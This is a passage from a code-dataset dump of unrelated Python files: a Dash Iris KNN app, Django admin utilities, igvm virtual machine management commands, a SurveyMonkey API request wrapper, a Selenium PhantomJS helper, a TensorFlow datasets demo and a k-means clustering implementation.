mendeley.save_keys()\n","sub_path":"external/dummy_mendeley.py","file_name":"dummy_mendeley.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"251512393","text":"import dash\n# contains widgets that can be dropped into app\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport plotly.graph_objs as go\nfrom dash.dependencies import Input, Output, State\nimport pandas as pd\nimport pickle\n\n\n########### Initiate the app\n# 'app' is required by heroku\napp = dash.Dash(__name__, external_stylesheets=['https://codepen.io/chriddyp/pen/bWLwgP.css'])\n# server name is specified in proc file\nserver = app.server\napp.title='knn'\n\n########### Set up the layout\n# generates HTML code\napp.layout = html.Div(children=[\n html.H1('Iris Classification'),\n # multi line single-Div\n html.Div([\n # sections have similar code but unique slider id\n # header\n html.H6('Sepal Length'),\n dcc.Slider(\n id='slider-1',\n min=1,\n max=8,\n step=0.1,\n marks={i:str(i) for i in range(1,9)},\n # default value\n value=5\n ),\n #added linebreak so no overlap on screen\n html.Br(),\n # header\n html.H6('Petal Length'),\n dcc.Slider(\n id='slider-2',\n min=1,\n max=8,\n step=0.1,\n marks={i:str(i) for i in range(1,9)},\n # default value\n value=5\n ),\n #added linebreak so no overlap on screen\n html.Br(),\n # where choice is made\n html.H6('# of Neighbors'),\n dcc.Dropdown(\n id = 'k-drop',\n value=5,\n options=[{'label': i, 'value':i} for i in [5,10,15,20,25]]\n ),\n # where output data will go\n html.H6(id='output-message', children='output will go here')\n ]),\n\n html.Br(),\n html.A('See The Underlying Code On Github', href='https://github.com/lineality/intro_knn_plotly'),\n])\n############ Interactive Callbacks\n# call back function, functions with decorators(specify input and output)\n@app.callback(Output('output-message', 'children'),\n [Input('k-drop', 'value'),\n Input('slider-1', 'value'),\n Input('slider-2', 'value')\n ])\n\n#\ndef display_results(k, value0, value1):\n # this opens the pickle\n # the opposite of pickling the file\n file = open(f'resources/model_k{k}.pkl', 'rb')\n model=pickle.load(file)\n file.close\n new_obs=[[value0,value1]]\n pred=model.predict(new_obs)\n specieslist=['setosa', 'versicolor','verginica']\n final_pred=specieslist[pred[0]]\n return f'For a flower with sepal length {value0} and petal length {value1}, the predicted species is\"{final_pred}\"'\n\n############ Execute the app\nif __name__ == '__main__':\n app.run_server()\n","sub_path":"draft and template app files/app_original_backup2.py","file_name":"app_original_backup2.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"34601481","text":"from django.contrib import admin, messages\nfrom django.contrib.auth.admin import UserAdmin, GroupAdmin\nfrom django.db.models import Model, Max\nfrom django.core.urlresolvers import reverse\nfrom django.utils.translation import ugettext, ugettext_lazy as _\nfrom django.conf import settings\n\n# from qbase.forms import TreeAdminForm, TreeNodeChoiceField\nfrom qbase.models import TreeModel, TreeForeignKey\nfrom qbase.models import get_model\n\n# 尚未完成\nclass TreeModelAdmin(admin.ModelAdmin):\n\n change_list_template = 'admin/tree_change_list.html'\n\n # form = TreeAdminForm\n\n def formfield_for_foreignkey(self, db_field, request, **kwargs):\n if (issubclass(db_field.rel.to, TreeModel) and \n not isinstance(db_field, TreeForeignKey) and \n db_field.name not in self.raw_id_fields\n ):\n db = kwargs.get('using')\n limit_choices_to = db_field.get_limit_choices_to()\n\n defaults = dict(\n form_class=TreeNodeChoiceField,\n queryset=db_field.rel.to._default_manager.using(db).complex_filter(limit_choices_to),\n required=False,\n )\n defaults.update(kwargs)\n kwargs = defaults\n return super(TreeModelAdmin, self).formfield_for_foreignkey(db_field, request, **kwargs)\n\n def get_ordering(self, request):\n mptt_opts = self.model._mptt_meta\n return self.ordering or (mptt_opts.ids_attr,)\n\n#\n\ndef model_admin_url(model_or_instance, action='', model_class=None):\n \"\"\" 根据 model_or_instance 生成 admin 的 url\n (model_or_instance) => changelist\n (model_or_instance, 'add')\n (instance[, model_class]) => 'change'\n (instance, 'delete'[, model_class]) => 'delete'\n # model_class 用来指定 proxy_model\n \"\"\"\n if not action:\n if isinstance(model_or_instance, Model):\n action = 'change'\n else:\n action = 'changelist'\n args = (model_or_instance.pk,) if action in ['change', 'delete'] else ()\n model_class = model_class or model_or_instance\n info = model_class._meta.app_label, model_class._meta.model_name, action\n return reverse('admin:%s_%s_%s' % info, args=args)\n\ndef unregister(model, **kwargs):\n \"\"\" 安全地从 admin 中 unregister model\n \"\"\"\n site = kwargs.pop('site', admin.site)\n site.is_registered(model) and site.unregister(model)\n\nclass StaffAdmin(UserAdmin):\n \"\"\" 只处理非 superuser 的 staff 用户\n 简化`显示`和`编辑` fields\n \"\"\"\n list_display = ('username', 'role', 'is_active', 'last_login', 'date_joined',)\n fieldsets = (\n (None, {'fields': ('username', 'email', 'password')}),\n (_('Permissions'), {'fields': ('is_active', 'groups')}),\n )\n add_fieldsets = (\n (None, {\n 'classes': ('wide',),\n 'fields': ('username', 'email', 'password1', 'password2'),\n }),\n (_('Permissions'), {\n 'classes': ('wide',),\n 'fields': ('is_active', 'groups')\n }),\n )\n list_filter = ('is_active',)\n search_fields = ('username', 'email')\n\n def get_queryset(self, request):\n qs = super(StaffAdmin, self).get_queryset(request)\n qs = qs.filter(is_staff=True, is_superuser=False)\n return qs\n\n Users = None\n def save_model(self, request, obj, form, change):\n if not change:\n if not self.Users:\n self.Users = get_model(settings.AUTH_USER_MODEL).objects\n row = self.Users.filter(pk__lt=100).aggregate(Max('pk'))\n obj.pk = row['pk__max'] + 1\n obj.is_staff = True\n obj.is_superuser = False\n if not obj.username and hasattr(obj, 'mobile_phone'):\n obj.username = obj.mobile_phone\n if not obj.username and hasattr(obj, 'email'):\n obj.username = obj.email\n if not obj.nickname and hasattr(obj, 'nickname'):\n obj.nickname = obj.username\n return super(StaffAdmin, self).save_model(request, obj, form, change)\n\n # 提高 权限集 的可读性\n def role(self, obj):\n return ','.join([str(g) for g in obj.groups.all()])\n role.short_description = _('权限集')\n\n#\n\nclass QModelAdmin(admin.ModelAdmin):\n\n pass\n\n#\n","sub_path":"qbase/qbase/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":4287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"594956664","text":"\"\"\"igvm - Command Routines\n\nCopyright (c) 2018, InnoGames GmbH\n\"\"\"\n\nimport logging\n\nfrom fabric.colors import green, red, white, yellow\nfrom fabric.network import disconnect_all\n\nfrom igvm.exceptions import InvalidStateError\nfrom igvm.host import with_fabric_settings\nfrom igvm.utils.units import parse_size\nfrom igvm.vm import VM\n\nlog = logging.getLogger(__name__)\n\n\ndef _check_defined(vm, fail_hard=True):\n error = None\n\n if not vm.hypervisor:\n error = ('\"{}\" has no hypervisor defined. Use --force to ignore this'\n .format(vm.fqdn))\n elif not vm.hypervisor.vm_defined(vm):\n error = ('\"{}\" is not built yet or is not running on \"{}\"'\n .format(vm.fqdn, vm.hypervisor.fqdn))\n\n if error:\n if fail_hard:\n raise InvalidStateError(error)\n else:\n log.info(error)\n\n\n@with_fabric_settings\ndef vcpu_set(vm_hostname, count, offline=False, ignore_reserved=False):\n \"\"\"Change the number of CPUs in a VM\"\"\"\n vm = VM(vm_hostname, ignore_reserved=ignore_reserved)\n _check_defined(vm)\n\n if offline and not vm.is_running():\n log.info(\n '\"{}\" is already powered off, ignoring --offline.'\n .format(vm.fqdn)\n )\n offline = False\n\n if count == vm.dataset_obj['num_cpu']:\n raise Warning('CPU count is the same.')\n\n if offline:\n vm.shutdown()\n vm.set_num_cpu(count)\n if offline:\n vm.start()\n\n\n@with_fabric_settings\ndef mem_set(vm_hostname, size, offline=False, ignore_reserved=False):\n \"\"\"Change the memory size of a VM\n\n Size argument is a size unit, which defaults to MiB.\n The plus (+) and minus (-) prefixes are allowed to specify a relative\n difference in the size. Reducing memory is only allowed while the VM is\n powered off.\n \"\"\"\n vm = VM(vm_hostname, ignore_reserved=ignore_reserved)\n _check_defined(vm)\n\n if size.startswith('+'):\n new_memory = vm.dataset_obj['memory'] + parse_size(size[1:], 'm')\n elif size.startswith('-'):\n new_memory = vm.dataset_obj['memory'] - parse_size(size[1:], 'm')\n else:\n new_memory = parse_size(size, 'm')\n\n if new_memory == vm.dataset_obj['memory']:\n raise Warning('Memory size is the same.')\n\n if offline and not vm.is_running():\n log.info(\n '\"{}\" is already powered off, ignoring --offline.'\n .format(vm.fqdn)\n )\n offline = False\n\n if offline:\n vm.shutdown()\n vm.set_memory(new_memory)\n if offline:\n vm.start()\n\n\n@with_fabric_settings\ndef disk_set(vm_hostname, size, ignore_reserved=False):\n \"\"\"Change the disk size of a VM\n\n Currently only increasing the disk is implemented. Size argument is\n allowed as text, but it must always be in GiBs without a decimal\n place. The plus (+) and minus (-) prefixes are allowed to specify\n a relative difference in the size. Of course, minus is going to\n error out.\n \"\"\"\n vm = VM(vm_hostname, ignore_reserved=ignore_reserved)\n _check_defined(vm)\n\n current_size_gib = vm.dataset_obj['disk_size_gib']\n if size.startswith('+'):\n new_size_gib = current_size_gib + parse_size(size[1:], 'g')\n elif size.startswith('-'):\n new_size_gib = current_size_gib - parse_size(size[1:], 'g')\n else:\n new_size_gib = parse_size(size, 'g')\n\n if new_size_gib == vm.dataset_obj['disk_size_gib']:\n raise Warning('Disk size is the same.')\n\n vm.hypervisor.vm_set_disk_size_gib(vm, new_size_gib)\n\n vm.dataset_obj['disk_size_gib'] = new_size_gib\n vm.dataset_obj.commit()\n\n\n@with_fabric_settings\ndef vm_build(vm_hostname, localimage=None, nopuppet=False, postboot=None,\n ignore_reserved=False):\n \"\"\"Create a VM and start it\n\n Puppet in run once to configure baseline networking.\n \"\"\"\n\n vm = VM(vm_hostname)\n\n # Could also have been set in serveradmin already.\n if not vm.hypervisor:\n vm.set_best_hypervisor(\n ['online', 'online_reserved'] if ignore_reserved else ['online']\n )\n\n vm.build(\n localimage=localimage,\n runpuppet=not nopuppet,\n postboot=postboot,\n )\n\n\n@with_fabric_settings\ndef vm_rebuild(vm_hostname, force=False):\n \"\"\"Destroy and reinstall a VM\"\"\"\n vm = VM(vm_hostname, ignore_reserved=True)\n _check_defined(vm)\n\n if vm.is_running():\n if force:\n vm.hypervisor.stop_vm_force(vm)\n else:\n raise InvalidStateError('\"{}\" is still running.'.format(vm.fqdn))\n\n vm.hypervisor.delete_vm(vm)\n vm.build()\n\n\n@with_fabric_settings\ndef vm_start(vm_hostname):\n \"\"\"Start a VM\"\"\"\n vm = VM(vm_hostname)\n _check_defined(vm)\n\n if vm.is_running():\n log.info('\"{}\" is already running.'.format(vm.fqdn))\n return\n vm.start()\n\n\n@with_fabric_settings\ndef vm_stop(vm_hostname, force=False):\n \"\"\"Gracefully stop a VM\"\"\"\n vm = VM(vm_hostname)\n _check_defined(vm)\n\n if not vm.is_running():\n log.info('\"{}\" is already stopped.'.format(vm.fqdn))\n return\n if force:\n vm.hypervisor.stop_vm_force(vm)\n else:\n vm.shutdown()\n log.info('\"{}\" is stopped.'.format(vm.fqdn))\n\n\n@with_fabric_settings\ndef vm_restart(vm_hostname, force=False, no_redefine=False):\n \"\"\"Restart a VM\n\n The VM is shut down and recreated, using the existing disk. This can be\n useful to discard temporary changes or adapt new hypervisor optimizations.\n No data will be lost.\n \"\"\"\n vm = VM(vm_hostname, ignore_reserved=True)\n _check_defined(vm)\n\n if not vm.is_running():\n raise InvalidStateError('\"{}\" is not running'.format(vm.fqdn))\n\n if force:\n vm.hypervisor.stop_vm_force(vm)\n else:\n vm.shutdown()\n\n if not no_redefine:\n vm.hypervisor.redefine_vm(vm)\n\n vm.start()\n log.info('\"{}\" is restarted.'.format(vm.fqdn))\n\n\n@with_fabric_settings\ndef vm_delete(vm_hostname, force=False, retire=False):\n \"\"\"Delete the VM from the hypervisor and from serveradmin\n\n If force is True the VM will be deleted even though it is still running on\n its hypervisor. Furthermore force will delete the serveradmin object, even\n if the VM doesn't have a hypervisor set in serveradmin or it has not yet\n been created on the defined hypervisor.\n\n If retire is True the VM will not be deleted from serveradmin but it's\n state will be updated to 'retired'.\n \"\"\"\n\n vm = VM(vm_hostname, ignore_reserved=True)\n # Make sure the VM has a hypervisor and that it is defined on it.\n # Abort if the VM has not been defined and force is not True.\n _check_defined(vm, fail_hard=not force)\n\n # Make sure the VM is shut down.\n # Abort if the VM is not shut down and force is not True.\n if vm.hypervisor and vm.hypervisor.vm_defined(vm) and vm.is_running():\n if force:\n vm.hypervisor.stop_vm_force(vm)\n else:\n raise InvalidStateError('\"{}\" is still running.'.format(vm.fqdn))\n\n # Delete the VM from its hypervisor if required.\n if vm.hypervisor and vm.hypervisor.vm_defined(vm):\n vm.hypervisor.delete_vm(vm)\n\n # Delete the serveradmin object of this VM\n # or update its state to 'retired' if retire is True.\n if retire:\n vm.dataset_obj['state'] = 'retired'\n vm.dataset_obj.commit()\n log.info(\n '\"{}\" is destroyed and set to \"retired\" state.'\n .format(vm.fqdn)\n )\n else:\n vm.dataset_obj.delete()\n vm.dataset_obj.commit()\n log.info(\n '\"{}\" is destroyed and deleted from Serveradmin'\n .format(vm.fqdn)\n )\n\n\n@with_fabric_settings\ndef vm_sync(vm_hostname):\n \"\"\"Synchronize VM resource attributes to Serveradmin\n\n This command collects actual resource allocation of a VM from the\n hypervisor and overwrites outdated attribute values in Serveradmin.\"\"\"\n vm = VM(vm_hostname, ignore_reserved=True)\n _check_defined(vm)\n\n attributes = vm.hypervisor.vm_sync_from_hypervisor(vm)\n changed = []\n for attrib, value in attributes.iteritems():\n current = vm.dataset_obj[attrib]\n if current == value:\n log.info('{}: {}'.format(attrib, current))\n continue\n log.info('{}: {} -> {}'.format(attrib, current, value))\n vm.dataset_obj[attrib] = value\n changed.append(attrib)\n if changed:\n vm.dataset_obj.commit()\n log.info(\n '\"{}\" is synchronized {} attributes ({}).'\n .format(vm.fqdn, len(changed), ', '.join(changed))\n )\n else:\n log.info(\n '\"{}\" is already synchronized on Serveradmin.'.format(vm.fqdn)\n )\n\n\n@with_fabric_settings\ndef host_info(vm_hostname):\n \"\"\"Extract runtime information about a VM\n\n Library consumers should use VM.info() directly.\n \"\"\"\n vm = VM(vm_hostname, ignore_reserved=True)\n\n info = vm.info()\n\n # Disconnect fabric now to avoid messages after the table\n disconnect_all()\n\n categories = (\n ('General', (\n 'hypervisor',\n 'status',\n )),\n ('Network', (\n 'intern_ip',\n 'mac_address',\n )),\n ('Resources', (\n 'num_cpu',\n 'max_cpus',\n 'memory',\n 'memory_free',\n 'max_mem',\n 'disk',\n 'disk_size_gib',\n 'disk_free_gib',\n )),\n # Anything else will appear in this section\n ('Other', None),\n )\n\n def _progress_bar(free_key, capacity_key, result_key, unit):\n \"\"\"Helper to show nice progress bars.\"\"\"\n if free_key not in info or capacity_key not in info:\n return\n free = info[free_key]\n del info[free_key]\n capacity = info[capacity_key]\n del info[capacity_key]\n\n simple_stats = (\n 'Current: {} {unit}\\n'\n 'Free: {} {unit}\\n'\n 'Max: {} {unit}'\n .format(capacity - free, free, capacity, unit=unit)\n )\n\n if not 0 <= free <= capacity > 0:\n log.warning(\n '{} ({}) and {} ({}) have weird ratio, skipping progress '\n 'calculation'\n .format(free_key, free, capacity_key, capacity)\n )\n info[result_key] = red(simple_stats)\n return\n\n assert free >= 0 and free <= capacity\n ratio = 1 - float(free) / float(capacity)\n if ratio >= 0.9:\n color = red\n elif ratio >= 0.8:\n color = yellow\n else:\n color = green\n\n max_bars = 20\n num_bars = int(round(ratio * max_bars))\n info[result_key] = (\n '[{}{}] {}%\\n{}'\n .format(\n color('#' * num_bars), ' ' * (max_bars - num_bars),\n int(round(ratio * 100)),\n simple_stats,\n )\n )\n\n _progress_bar('memory_free', 'memory', 'memory', 'MiB')\n _progress_bar('disk_free_gib', 'disk_size_gib', 'disk', 'GiB')\n\n max_key_len = max(len(k) for k in info.keys())\n for category, keys in categories:\n # Handle 'Other' section by defaulting to all keys\n keys = keys or info.keys()\n\n # Any info available for the category?\n if not any(k in info for k in keys):\n continue\n\n print('')\n print(white(category, bold=True))\n for k in keys:\n if k not in info:\n continue\n\n # Properly re-indent multiline values\n value = str(info.pop(k))\n value = ('\\n' + ' ' * (max_key_len + 3)).join(value.splitlines())\n print('{} : {}'.format(k.ljust(max_key_len), value))\n\n\n@with_fabric_settings\ndef vm_rename(vm_hostname, new_hostname, offline=False):\n \"\"\"Redefine the VM on the same hypervisor with a different name\n\n We can only do this operation offline. If the VM is online, it needs\n to be shut down. No data will be lost.\n \"\"\"\n\n vm = VM(vm_hostname, ignore_reserved=True)\n _check_defined(vm)\n\n if not offline:\n raise NotImplementedError(\n 'Rename command only works with --offline at the moment.'\n )\n if not vm.is_running():\n raise NotImplementedError(\n 'Rename command only works online at the moment.'\n )\n\n vm.rename(new_hostname)\n","sub_path":"igvm/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":12315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"414307547","text":"\"\"\"Copyright (C) Sam Esla, 2016. MIT License. https://opensource.org/licenses/MIT\"\"\"\nimport json\nimport requests\n\n\nclass RequestMaker:\n \"\"\"\n This class does all the HTTP GET/POST/PUT/PATCH/DEL requests to the API. SMAPICredentials is required.\n It gets API key, access token, and auth headers from this and prepares a Response.session()\n Only GET and POST implemented so far.\n \"\"\"\n\n def __init__(self, api_key, access_token, url):\n \"\"\"\n :param api_key: str: api key associated with the sm dev portal app\n :param access_token: str: access token associated to authenticated user (whose surveys and data it can access). You may get one with get_token function in a future release.\n :param url: str: base url for sm api. I made this in case I want to test in different environments :)\n \"\"\"\n if api_key is None or access_token is None or url is None:\n raise TypeError(\"The SM API requests require api_key, and access_token, and url (default value should do!)\")\n\n self.url = url\n self.session = RequestMaker._prepare_session(api_key, access_token)\n\n def post(self, uri, params=None, payload=None, payload_as_json=None):\n \"\"\"\n Simple POST function wrapper around requests. Uses a Requests.session() from (self) to keep track of\n auth headers+params so we don't have to pass them in each time.\n\n :param uri: str: the url suffix to attach to base URL to make the request\n :param params: dict: url paramters to pass to API\n :param payload: dict/list: data in python data structure format\n :param payload_as_json: str: data already in json format\n :return: response: str: a json response from the POST\n \"\"\"\n response = self.session.post(self.url + uri, params=params, json=payload, data=payload_as_json)\n return RequestMaker._process_response(\"Post %s\" % self.url+uri, response)\n\n def get(self, uri, params=None):\n \"\"\"\n Simple GET function wrapper around requests. Uses a Requests.session() from (self) to keep track of\n auth headers+params so we don't have to pass them in each time.\n\n :param uri: str: the url suffix to attach to base URL to make the request\n :param params: dict: url paramters to pass to API\n :return: response: str: a json response from the GET\n \"\"\"\n response = self.session.get(self.url + uri, params=params)\n return RequestMaker._process_response(\"Get %s\" % self.url+uri, response)\n\n @staticmethod\n def _prepare_session(api_key, access_token):\n \"\"\"\n Function to prepare the Requests.session() object.\n\n :param api_key: str: api key associated with the sm dev portal app\n :param access_token: str: access token associated to authenticated user\n :return: Request.session: returns a session that has all the details to authorize it\n to make requests to the API.\n \"\"\"\n session = requests.Session()\n session.params[\"api_key\"] = str(api_key)\n session.headers[\"Authorization\"] = \"bearer \" + str(access_token)\n session.headers[\"Content-Type\"] = \"application/json\"\n return session\n\n @staticmethod\n def _process_response(request, response):\n \"\"\"\n Check if the request was successful, and if so, send json data out,\n otherwise raise an exception.\n\n :param response: Requests.response object: The actual response object from the request.\n :return: returns: str: a json representing the object(s) requested from the API, or error.\n \"\"\"\n if str(response.status_code).startswith('2'):\n print(\"%s Success! %s\" % (request, response.status_code))\n return response.json()\n else:\n raise RequestMakerException(request, response)\n\n\nclass RequestMakerException(Exception):\n \"\"\"\n RequestMakerException class. Puts relevant data in easy to read format.\n\n \"\"\"\n\n def __init__(self, request, response):\n Exception.__init__(self)\n self.response = response\n self.request = request\n self.message = str(self)\n\n def __str__(self):\n errs = list()\n errs.append(\"%s Failed!\" % self.request)\n errs.append(\"Status: %s\" % self.response.status_code)\n errs.append(\"Method: %s\" % self.response.request.method)\n errs.append(\"URL: %s\" % self.response.request.url)\n errs.append(\"Headers:\")\n errs.append(json.dumps(self.response.headers, default=lambda o: o.__dict__, sort_keys=True, indent=4))\n errs.append(\"Content:\")\n errs.append(json.dumps(self.response.json(), default=lambda o: o.__dict__, sort_keys=True, indent=4))\n err = '\\n'.join(errs)\n return err\n","sub_path":"request_maker.py","file_name":"request_maker.py","file_ext":"py","file_size_in_byte":4768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"521807475","text":"from selenium import webdriver\n\nfrom adaptation.core.functions import is_url, file_to_url\n\n\nclass SeleniumPhantomJSDriver:\n def __init__(self):\n self.driver = webdriver.PhantomJS()\n\n def execute_script(self, url, script):\n if not is_url(url):\n url = file_to_url(url)\n\n self.driver.get(url)\n\n result = self.driver.execute_script(script)\n\n if 'callPhantom' in result:\n result.remove('callPhantom')\n\n return result\n\n def __del__(self):\n self.driver.quit()\n","sub_path":"adaptation/conflicts/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"537418772","text":"import tensorflow as tf\nimport tensorflow_datasets as tfds\n\nprint(f'Found {len(tfds.list_builders())} datasets')\nprint(tfds.list_builders()[:10])\n\n# CelabA dataset\n\nceleba_bldr = tfds.builder('celeb_a')\n\nprint(celeba_bldr.info.features)\nprint(celeba_bldr.info.features['image'])\nprint(celeba_bldr.info.features['attributes'].keys())\n\nceleba_bldr.download_and_prepare()\n\ndatasets = celeba_bldr.as_dataset(shuffle_files=False)\ndatasets.keys()\n\nds_train = datasets['train']\nassert isinstance(ds_train, tf.data.Dataset)\n\nds_train = ds_train.map(lambda item: (item['image'], tf.cast(item['attributes']['Male'], tf.int32)))\n\nds_train = ds_train.batch(18)\nimages, labels = next(iter(ds_train))\nprint(images.shape, labels)\n\nimport matplotlib.pyplot as plt\n\nfig = plt.figure(figsize=(12, 8))\nfor i, (image, label) in enumerate(zip(images, labels)):\n ax = fig.add_subplot(3, 6, i+1)\n ax.set_xticks([])\n ax.set_yticks([])\n ax.imshow(image)\n ax.set_title(f'{label}', size=15)\nplt.show()\n\n\n# MNIST dataset\n\nmnist, mnist_info = tfds.load('mnist', with_info=True, shuffle_files=False)\n\nprint(mnist_info)\nprint(mnist.keys())\n\nds_train = mnist['train']\nds_train = ds_train.map(lambda item: (item['image'], item['label']))\nds_train = ds_train.batch(10)\nbatch = next(iter(ds_train))\nprint(batch[0].shape, batch[1])\n\nfig = plt.figure(figsize=(15, 6))\nfor i, (image, label) in enumerate(zip(batch[0], batch[1])):\n ax = fig.add_subplot(2, 5, i+1)\n ax.set_xticks([])\n ax.set_yticks([])\n ax.imshow(image[:, :, 0], cmap='gray_r')\n ax.set_title(f'{label}', size=15)\nplt.show()\n","sub_path":"13-training-with-tensorflow/04.loading-tf-dataset-libraries.py","file_name":"04.loading-tf-dataset-libraries.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"642110730","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\nimport time\nfrom ClusterUtils.SuperCluster import SuperCluster\nfrom ClusterUtils.ClusterPlotter import _plot_kmeans_\n\nTHRESHOLD = 1e-9\n\n\ndef plot_centroids(centroids):\n plt.scatter(*zip(*centroids))\n plt.show()\n\n\ndef init_random(data, n_clusters):\n return [data[i] for i in np.random.permutation(len(data))[:n_clusters]]\n\n\ndef init_kmeanpp(data, n_clusters):\n # 1st random pick one as centroid to begin with\n centroids = list()\n centroids.append(data[random.randint(0, len(data) - 1)])\n\n # 2nd compute the min distance between every data point and the centroids\n while len(centroids) < n_clusters:\n distances = list(min([np.linalg.norm(x - c) ** 2 for c in centroids]) for x in data)\n\n sum_dist = sum(distances)\n prob = map(lambda d: d / sum_dist, distances)\n\n # pick randomly with range\n # range [0, 1)\n ran = random.random()\n sum_prob = 0\n i = 0\n for num in prob:\n sum_prob += num\n if sum_prob > ran:\n # found the centroid\n centroids.append(data[i])\n break\n i += 1\n return centroids\n\n\ndef init_global(data, n_clusters):\n def naive_kmeans(X, inner_centroids, max_iter=300):\n best_inertia = -1\n for _ in range(max_iter):\n assignment = np.array([np.argmin([np.linalg.norm(centroid - row) for centroid in inner_centroids]) for row in X])\n inner_centroids = [np.average(X[np.where(assignment == cluster)[0]], axis=0) for cluster in range(len(inner_centroids))]\n sse = objective_function(X, assignment, inner_centroids)\n # this run has reached local minimal\n if abs(sse - best_inertia) <= THRESHOLD:\n # that's it\n return inner_centroids\n\n # not good enough, go on iteration\n best_inertia = sse\n\n centroids = []\n for num in range(1, n_clusters + 1):\n if num == 1:\n centroids.append(np.average(data, axis=0))\n continue\n # for n_clusters > 1\n # add a random point to previous centroids\n random_point = data[random.randint(0, len(data) - 1)]\n centroids.append(random_point)\n centroids = naive_kmeans(data, centroids)\n\n return centroids\n\n\ndef objective_function(X, assignment, centroids):\n \"\"\"\n Calculate the cost of current assignment by SSE (Square Sum Error)\n :param assignment: a np.array of integer that represents id of clusters\n :param centroids: a list of np.array that represents centroids for each cluster\n :return: float\n \"\"\"\n\n # Determine distance by the square of euclidean distance\n def square_dist(x):\n \"\"\"\n :param x: np.array, for example: [3.0, 4.0]\n :return: for example: 25.0\n \"\"\"\n return sum(each ** 2 for each in x)\n\n datasets = [X[np.where(assignment == cluster)[0]] for cluster in range(len(centroids))]\n sse_sum = 0\n for i in range(len(datasets)):\n sse_sum += sum(square_dist(row - centroids[i]) for row in datasets[i])\n\n return sse_sum\n\n\ndef kmeans_lloyds(X, n_clusters=3, init='random', n_init=1, max_iter=300, verbose=False):\n init_methods = {\n \"random\": init_random,\n \"k-mean++\": init_kmeanpp,\n \"global\": init_global\n }\n\n best_centroids, best_assignment, best_inertia = None, None, None\n\n if verbose:\n print(\"\\n>>> Starting Lloyds k-means with {} init, {} clusters\".format(init, n_clusters))\n\n # for each iteration of this algorithm\n for _run in range(n_init):\n # init centroids\n centroids = init_methods[init](X, n_clusters)\n\n inertia = -1\n for _iter in range(max_iter):\n assignment = np.array([np.argmin([np.linalg.norm(centroid - row) for centroid in centroids]) for row in X])\n centroids = [np.average(X[np.where(assignment == cluster)[0]], axis=0) for cluster in range(n_clusters)]\n\n sse = objective_function(X, assignment, centroids)\n # this run has reached local minimal\n if abs(sse - inertia) <= THRESHOLD:\n if best_inertia is not None and sse >= best_inertia:\n # we are doing worse, just skip this run\n if verbose:\n print(\">>> Discard iteration {} at run {}, with sse {:.2f}\".format(_iter, _run, sse))\n break\n # that's it, finish this run and record the result\n best_centroids = centroids\n best_assignment = assignment\n best_inertia = sse\n\n if verbose:\n print(\">>> Accept K-mean after iteration {} at run {}, with sse: {:.2f}\".format(_iter, _run, sse))\n break\n\n # not good enough, go no iteration\n inertia = sse\n\n return best_centroids, best_assignment, best_inertia\n\n\ndef kmeans_hartigans(X, n_clusters=3, init='random', n_init=1, max_iter=300, verbose=False):\n def d(x, i_cluster, assignment, centroids):\n scalar = 0.5\n n = np.count_nonzero(assignment == i_cluster)\n fraction = n / (n + 1)\n dist = np.linalg.norm(x - centroids[i_cluster]) ** 2\n return scalar * fraction * dist\n\n init_methods = {\n \"random\": init_random,\n \"k-mean++\": init_kmeanpp,\n \"global\": init_global\n }\n\n best_centroids, best_assignment, best_inertia = None, None, None\n\n if verbose:\n print(\">>> Starting Hartigan's k-means with {} init, {} clusters\".format(init, n_clusters))\n\n for _run in range(n_init):\n centroids = init_methods[init](X, n_clusters)\n inertia = -1\n\n for _iter in range(max_iter):\n assignment = np.array([np.argmin([np.linalg.norm(centroid - row) for centroid in centroids]) for row in X])\n\n # main loop\n done = False\n while not done:\n done = True\n for i_data_point in range(len(X)):\n # for each data point, remove it from current cluster, update the centroid of that cluster\n prev_cluster = assignment[i_data_point]\n assignment[i_data_point] = -1\n centroids[prev_cluster] = np.average(X[np.where(assignment == prev_cluster)], axis=0)\n\n # and find a new cluster to assign to by function D(x)\n list_result = [d(X[i_data_point], cluster, assignment, centroids) for cluster in range(len(centroids))]\n new_cluster = np.argmin(list_result)\n if new_cluster != prev_cluster:\n done = False\n\n # if it gets assigned to a new cluster, merge it into it and update the centroid of that new cluster, and set done to False\n assignment[i_data_point] = new_cluster\n centroids[new_cluster] = np.average(X[np.where(assignment == new_cluster)], axis=0)\n\n # after each iteration, lets check the objective function\n sse = objective_function(X, assignment, centroids)\n # this run has reached local minimal\n if abs(sse - inertia) <= THRESHOLD:\n if best_inertia is not None and sse >= best_inertia:\n # we are doing worse, just skip this run\n if verbose:\n print(\">>> Discard iteration {} at run {}, with sse {:.2f}\".format(_iter, _run, sse))\n break\n # that's it, finish this run and record the result\n best_centroids = centroids\n best_assignment = assignment\n best_inertia = sse\n\n if verbose:\n print(\">>> Accept K-mean after iteration {} at run {}, with sse: {:.2f}\".format(_iter, _run, sse))\n break\n\n # not good enough, go no iteration\n inertia = sse\n\n return best_centroids, best_assignment, best_inertia\n\n\ndef k_means(X, n_clusters=3, init='random', algorithm='lloyds', n_init=1, max_iter=300, verbose=False):\n cluster_algorithm = {\n \"lloyds\": kmeans_lloyds,\n \"hartigans\": kmeans_hartigans\n }\n\n # Implement.\n # Input: np.darray of samples\n best_centroids, best_assignment, best_inertia = cluster_algorithm[algorithm](X, n_clusters, init, n_init, max_iter, verbose)\n\n # Return the following:\n #\n # 1. labels: An array or list-type object corresponding to the predicted\n # cluster numbers,e.g., [0, 0, 0, 1, 1, 1, 2, 2, 2]\n # 2. centroids: An array or list-type object corresponding to the vectors\n # of the centroids, e.g., [[0.5, 0.5], [-1, -1], [3, 3]]\n # 3. inertia: A number 